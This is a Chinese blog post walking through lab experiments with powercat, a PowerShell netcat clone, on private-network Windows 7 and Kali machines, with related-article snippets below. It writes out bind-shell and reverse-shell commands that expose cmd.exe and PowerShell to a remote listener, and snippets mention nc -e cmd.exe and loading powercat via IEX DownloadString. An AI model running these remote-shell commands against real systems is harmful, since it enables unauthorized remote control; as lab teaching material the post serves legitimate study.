windows 反弹shell_windows版瑞士军刀powercat之牛刀小试

最新推荐文章于 2024-09-28 22:28:44 发布
最新推荐文章于 2024-09-28 22:28:44 发布
阅读量256 收藏
点赞数 1
文章标签: windows 反弹shell

6e13997dcbf31e12fdeed0534e56fc64.png

时间过的太快,又到深夜了,又要开始刷抖音或网抑云了。今天一位同事因为晚上没有加班,去拿20块钱的夜宵,被举报了。这种在领导面前打小报告的人,职场里面非常多。同事之间要多堤防着,保不准哪一天其中有人会出卖你。这篇文章做了4个小实验:

  • powercat 正向shell(windows-linux)
  • powercat 反向shell(windows-linux)
  • powercat 反向powershell(windows-windows)
  • powercat 反向获取文件(windows-windows)(失败了)
powercat 正向shell(windows-linux)
  • 在win7上运行powercat,先弹shell后连接(属于正向shell)
powercat -l -p 23333 -e cmd.exe -v

2031661aecb52f24d8d8b787ace5b497.png
  • 在kali rolling上连接
nc 192.168.160.135 23333 -vv

4cb2e2510627a86d07f355c949dc671e.png
powercat 反向shell(windows-linux)
  • 在kali rolling上监听
nc -lp 23333 -vv

0a4d33be09fdb7e83902e553f920dd3b.png
  • 在win7上运行powercat,弹出一个cmd
powercat -c 192.168.160.140 -p 23333 -v -e cmd.exe

0c9631e65dc1e89d99846236b0289711.png
powercat 反向powershell(windows-windows)
  • 在win7(ailx00)上运行powercat,监听23333端口(先听后弹,属于反向shell)
powercat -l -p 23333 -v

bab76ed0026aebca91a609f9d9a62e66.png
  • 在win7上((ailx01))运行powercat,反弹一个poweshell
powercat -c 192.168.160.135 -p 23333 -v -ep

78a4657b5283d3e75f820a9ec0e89fe8.png
powercat 反向获取文件(windows-windows)
  • 然鹅,这个实验并没有成功,不知道哪出问题了
  • 正着做,反着做,都不对,算了,就酱紫了
  • 在win7(ailx01)上运行powercat,监听23333端口(先听后弹,属于反向shell)

cabf74b2fa1a53acf6a0eae6ef7055c7.png
  • 在win7(ailx00)上运行powercat,发送文件

3cbf75b6ca3a5e9f267c1eb33eee633f.png

本篇完~

weixin_39963080
关注
内网隧道代理技术(六)之 PowerCat反弹Shell
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-25 690
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncatpowershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。
[ 隧道技术 ] 反弹shell的集中常见方式(三)powercat反弹shell
qq_51577576的博客
09-04 766
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncatpowershell的实现,然后里面也加入了众多好 用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2123
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
Windows的几种常用反弹shell方法
最新发布
lza20001103的博客
09-28 996
Windows的几种常用反弹shell方法
Windows 反弹 Shell
weixin_30414245的博客
08-03 580
NC 反弹 shell 攻击场景:   Victim IP: 192.168.2.10   Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cm...
Windows反弹Shell
qq_62073002的博客
04-26 1128
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
Window下的反弹shell
qq_58000413的博客
05-05 1301
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1103
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
内网渗透之Windows反弹shell(三)
墨鱼菜鸡
09-10 363
目录 Windows反弹shell 06Powershell.exe 通过PowerShell发起Powercat攻击 通过Web Delivery反弹shell 通过powershell启动cscript.exe 通过powershell启动bat文件 通过powershell启动exe文件 内网渗透之Windows反弹shell(四)...
Windows反弹shell测试
oscarli的博客
05-30 365
windows反弹shell测试记录
Windows反弹shell的方法
热门推荐
2ed
07-16 1万+
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell:...
cmd反弹shell提权
10-24
cmd反弹shell提权
Windows 反弹shell方法
weixin_53747497的博客
07-12 3082
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
简单易上手!Windows反弹shell实现
weixin_54475173的博客
01-02 521
Windows反弹shell
渗透测试-window反弹shell
lza20001103的博客
05-11 4992
window反弹shell
windows反弹shell复现
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
Windows系统反弹shell常见方法总结
Bird&Bird
07-17 3892
目录一、Powercat反弹shell二、Nishang反弹shell三、UDP反弹shell四、Metasploit反弹shell五、nc反弹 一、Powercat反弹shell powercat下载: powercat. powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种: 其一:下载powercat.ps1至本地,并加载 其二:从URL加载 powershell IEX (New-Object System.Net.Webclient).DownloadStri
Windows优化维护瑞士军刀Glary Utilities Pro绿色
nbk2014的博客
03-07 652
Glary Utilities是国外功能强大的系统优化软件,系统清理与优化工具,提供了涵盖系统优化、管理、保护和加速所有功能。能实现系统垃圾文件清理、注册表键值清理、上网记录等个人隐私文件清理、IE插件管理和删除、磁盘空间使用情况分析、查找重复文件、优化内存、清理无效快捷方式、系统启动项、软件卸载、安全粉碎文件、查找空目录等众多功能,非常优秀的系统维护工具! 本次分享的本: 基于官方便携包,反汇编处理,免授权解锁专业 预设置:改简体中文、不开机启动、不检测更新等 补全中文翻译,删升级程序、垃圾程序、多
windows反弹shell方法
09-21
Windows反弹shell有多种方法,其中包括Powercat反弹shell、Nishang反弹shell和使用邮件地址作为反弹shell的服务器地址。 Powercat反弹shell是一种通过PowerShell实现的方法。攻击者可以在目标机器的cmd中执行命令,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值